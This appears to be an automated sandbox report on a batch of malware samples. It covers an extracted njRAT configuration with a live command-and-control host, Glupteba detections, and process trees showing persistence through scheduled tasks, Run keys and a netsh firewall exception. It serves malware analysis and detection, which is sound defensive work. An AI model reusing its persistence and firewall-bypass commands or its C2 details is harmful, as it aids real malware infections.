Analysis
max time kernel: 1200s
max time network: 1201s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240426-en locale:en-us os:windows10-2004-x64 system
submitted: 19-05-2024 11:19
Static task: static1
URLScan task: urlscan1
General
Malware Config
Extracted
Family: njrat
Version: 0.7d
Botnet: jjj
C2: youri.mooo.com:1605
Mutex: e936a10f968ac948cd351c9629dbd36d
reg_key: e936a10f968ac948cd351c9629dbd36d
splitter: |'|'|
Signatures
Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs 64 IoCs
Glupteba payload 7 IoCs
Processes:
resource | yara_rule
behavioral1/memory/2208-327-0x0000000000400000-0x0000000002B0B000-memory.dmp | family_glupteba
behavioral1/memory/4988-357-0x0000000000400000-0x0000000002B0B000-memory.dmp | family_glupteba
behavioral1/memory/4988-407-0x0000000000400000-0x0000000002B0B000-memory.dmp | family_glupteba
behavioral1/memory/1596-433-0x0000000000400000-0x0000000002B0B000-memory.dmp | family_glupteba
behavioral1/memory/1596-486-0x0000000000400000-0x0000000002B0B000-memory.dmp | family_glupteba
behavioral1/memory/1596-989-0x0000000000400000-0x0000000002B0B000-memory.dmp | family_glupteba
behavioral1/memory/1596-2677-0x0000000000400000-0x0000000002B0B000-memory.dmp | family_glupteba
Modifies AppInit DLL entries 2 TTPs
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
pid | Process
3084 | netsh.exe
2504 | netsh.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation | locxopti.exe
Drops startup file 4 IoCs
Processes:
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\locxopti.exe | virussign.com_0fcd98c430355cad3e548a63ba704cd4.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\locxopti.exe | virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\locxopti.exe.tmp | virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\locxopti.exe.dat | virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe
Executes dropped EXE 64 IoCs
Loads dropped DLL 64 IoCs
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
UPX packed file 3 IoCs
Processes:
resource | yara_rule
behavioral1/memory/3008-839-0x0000000000400000-0x00000000008DF000-memory.dmp | upx
behavioral1/files/0x000a0000000238cb-4611.dat | upx
behavioral1/files/0x00120000000238d6-4939.dat | upx
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Parametr = "C:\\KaVBTL\\optixsys.exe" | virussign.com_0fcd98c430355cad3e548a63ba704cd4.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2 = "C:\\ProgramData\\winmgr107.exe" | virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2 = "C:\\ProgramData\\winmgr107.exe" | winmgr107.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | csrss.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Parametr = "C:\\SysDrvM6\\abodloc.exe" | virussign.com_0fcd98c430355cad3e548a63ba704cd4.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
Enumerates connected drives 3 TTPs 3 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description | ioc | Process
File opened (read-only) | \??\e: | virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe
File opened (read-only) | \??\e: | winmgr107.exe
File opened (read-only) | \??\e: | virussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exe
Manipulates WinMonFS driver. 1 IoCs
Rootkits write to WinMonFS to hide directories/files from being detected.
Processes:
description | ioc | Process
File opened for modification | \??\WinMonFS | csrss.exe
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource | yara_rule
behavioral1/files/0x0008000000023445-235.dat | autoit_exe
behavioral1/files/0x00080000000234a5-265.dat | autoit_exe
Drops file in System32 directory 64 IoCs
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | Process | procid_target
PID 4508 set thread context of 4248 | 4508 | winmgr107.exe | 150
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
description | ioc | Process
File opened (read-only) | \??\VBoxMiniRdrDN | virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe
Drops file in Program Files directory 4 IoCs
Processes:
description | ioc | Process
File created | C:\Program Files\Common Files\System\symsrv.dll | virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe
File created | \??\c:\progra~1\common~1\system\symsrv.dll.000 | winmgr107.exe
File created | C:\Program Files\7-Zip\7zFM.exe.tmp | virussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exe
File created | \??\c:\progra~1\common~1\system\symsrv.dll.000 | winmgr107.exe
Drops file in Windows directory 4 IoCs
Processes:
description | ioc | Process
File created | C:\Windows\rss\csrss.exe | virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe
File created | C:\Windows\windefender.exe | csrss.exe
File opened for modification | C:\Windows\windefender.exe | csrss.exe
File opened for modification | C:\Windows\rss | virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe
Launches sc.exe 1 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | Process
4660 | sc.exe
Processes:
pid | Process
4972 | powershell.exe
6604 | powershell.exe
1464 | powershell.exe
3548 | powershell.exe
2224 | powershell.exe
2300 | powershell.exe
6072 | powershell.exe
5692 | powershell.exe
11128 | powershell.exe
7720 | powershell.exe
5092 | powershell.exe
4672 | powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 3 IoCs
Processes:
pid | pid_target | Process | procid_target
12020 | 11948 | WerFault.exe | 738
8284 | 6940 | WerFault.exe | 1074
6528 | 11372 | WerFault.exe | 1080
Creates scheduled task(s) 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
pid | Process
7628 | NETSTAT.EXE
7320 | ipconfig.exe
GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes: (none attributed)
- HTTP User-Agent header, flow 203: Go-http-client/1.1
- HTTP User-Agent header, flow 205: Go-http-client/1.1
- HTTP User-Agent header, flow 208: Go-http-client/1.1
Modifies data under HKEY_USERS 64 IoCs
Processes: powershell.exe, virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe, windefender.exe
Modifies registry class 64 IoCs
Processes: virussign.com_0d1d052a017c095816dffa6e1789be93.exe and the *32.exe processes (Cfdgfh32.exe, Hahcieng.exe, Mbpdnm32.exe and others)
NTFS ADS 16 IoCs
Processes: virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe, winmgr107.exe
- File created: C:\Users\Admin\Desktop\virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe:Zone.Identifier:$DATA (virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe)
- File created: C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA (winmgr107.exe)
- File opened for modification: C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA (winmgr107.exe, 14 times)
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: vlc.exe
- PID 4352 vlc.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: msedge.exe, identity_helper.exe, virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe, winmgr107.exe, RegAsm.exe, powershell.exe
- msedge.exe: PIDs 216, 2408, 1616, 1792
- identity_helper.exe: PID 3484
- virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe: PID 1652
- winmgr107.exe: PIDs 4508, 5056
- RegAsm.exe: PID 4248
- powershell.exe: PID 5092
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
Processes: 7zFM.exe, OpenWith.exe, vlc.exe, RegAsm.exe
- PID 1588 7zFM.exe
- PID 4768 OpenWith.exe
- PID 4352 vlc.exe
- PID 4248 RegAsm.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes: msedge.exe
- PID 2408 msedge.exe (all 7 IoCs)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: 7zFM.exe, RegAsm.exe, powershell.exe, virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe, csrss.exe, sc.exe
- 7zFM.exe (PID 1588): SeRestorePrivilege, 35, SeSecurityPrivilege
- RegAsm.exe (PID 4248): SeDebugPrivilege, 33, SeIncBasePriorityPrivilege
- powershell.exe (PIDs 5092, 4672, 1464, 2224, 2300, 3548, 4972): SeDebugPrivilege
- virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe (PID 2208): SeDebugPrivilege, SeImpersonatePrivilege
- csrss.exe (PID 1596): SeSystemEnvironmentPrivilege
- sc.exe (PID 4660): SeSecurityPrivilege
Suspicious use of FindShellTrayWindow 64 IoCs
Processes: msedge.exe
- PID 2408 msedge.exe (all 64 IoCs)
Suspicious use of SendNotifyMessage 33 IoCs
Processes: msedge.exe, vlc.exe
- PID 2408 msedge.exe
- PID 4352 vlc.exe
Suspicious use of SetWindowsHookEx 20 IoCs
Processes: OpenWith.exe, vlc.exe, virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe, virussign.com_7a14384c52b18fe49305121250840bff.exe
- PID 4768 OpenWith.exe
- PID 4352 vlc.exe
- PID 11256 virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe
- PID 740 virussign.com_7a14384c52b18fe49305121250840bff.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes: msedge.exe
- PID 2408 msedge.exe wrote to memory of PID 3720 (procid_target 82)
- PID 2408 msedge.exe wrote to memory of PID 2140 (procid_target 83)
- PID 2408 msedge.exe wrote to memory of PID 216 (procid_target 84)
- PID 2408 msedge.exe wrote to memory of PID 4996 (procid_target 85)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(each nested entry is a child process of the entry above it; the indented "-" lines are the sandbox's behaviour tags for that process)

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://samples.vx-underground.org/tmp/Virussign.2024.05.16.7z  [PID 2408]
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe875746f8,0x7ffe87574708,0x7ffe87574718  [PID 3720]
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2  [PID 2140]
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3  [PID 216]
      - Suspicious behavior: EnumeratesProcesses
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8  [PID 4996]
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1  [PID 3532]
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1  [PID 5036]
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 /prefetch:8  [PID 732]
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 /prefetch:8  [PID 3484]
      - Suspicious behavior: EnumeratesProcesses
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1  [PID 4168]
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1  [PID 4004]
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1  [PID 4780]
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1  [PID 3624]
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3756 /prefetch:8  [PID 2768]
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1  [PID 4308]
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5532 /prefetch:8  [PID 1616]
      - Suspicious behavior: EnumeratesProcesses
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:2  [PID 1792]
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\System32\CompPkgSrv.exe -Embedding  [PID 2040]

C:\Windows\System32\CompPkgSrv.exe -Embedding  [PID 3908]

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding  [PID 2228]

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Virussign.2024.05.16.7z"  [PID 1588]
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\OpenWith.exe -Embedding  [PID 4768]
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
    "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\virussign.com_0a20b558065db2051bcbfa0cd7fe943f.vir"  [PID 4352]
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of SendNotifyMessage
      - Suspicious use of SetWindowsHookEx

"C:\Users\Admin\Desktop\virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe"  [PID 1652]
  - Executes dropped EXE
  - Adds Run key to start application
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
    C:\Windows\system32\cmd.exe /c start C:\PROGRA~3\VIRUSS~1.TXT  (image: C:\Windows\SysWOW64\cmd.exe)  [PID 452]
      - Checks computer location settings
        "C:\Windows\system32\NOTEPAD.EXE" C:\PROGRA~3\virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe.txt  (image: C:\Windows\SysWOW64\NOTEPAD.EXE)  [PID 3748]
    C:\ProgramData\winmgr107.exe  [PID 4508]
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of SetThreadContext
      - NTFS ADS
      - Suspicious behavior: EnumeratesProcesses
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe  (command line: 0)  [PID 4248]
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: GetForegroundWindowSpam
          - Suspicious use of AdjustPrivilegeToken
            netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE  (image: C:\Windows\SysWOW64\netsh.exe)  [PID 2504]
              - Modifies Windows Firewall
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 2064]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 2304]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 1088]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 4308]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 3680]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 2848]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 3972]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 3824]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 400]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 1616]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 4180]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 2788]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 1720]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 3392]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 4180]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 1216]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 6256]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8348]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 11040]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 11596]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 10596]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 10400]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 10124]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 11824]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9420]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9332]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9140]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9504]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9272]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 10036]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9756]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9248]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 10140]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 11844]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9816]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 12152]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9444]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9184]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8980]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8468]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8604]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 11840]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8424]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9160]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8768]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8600]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8396]
          - Creates scheduled task(s)
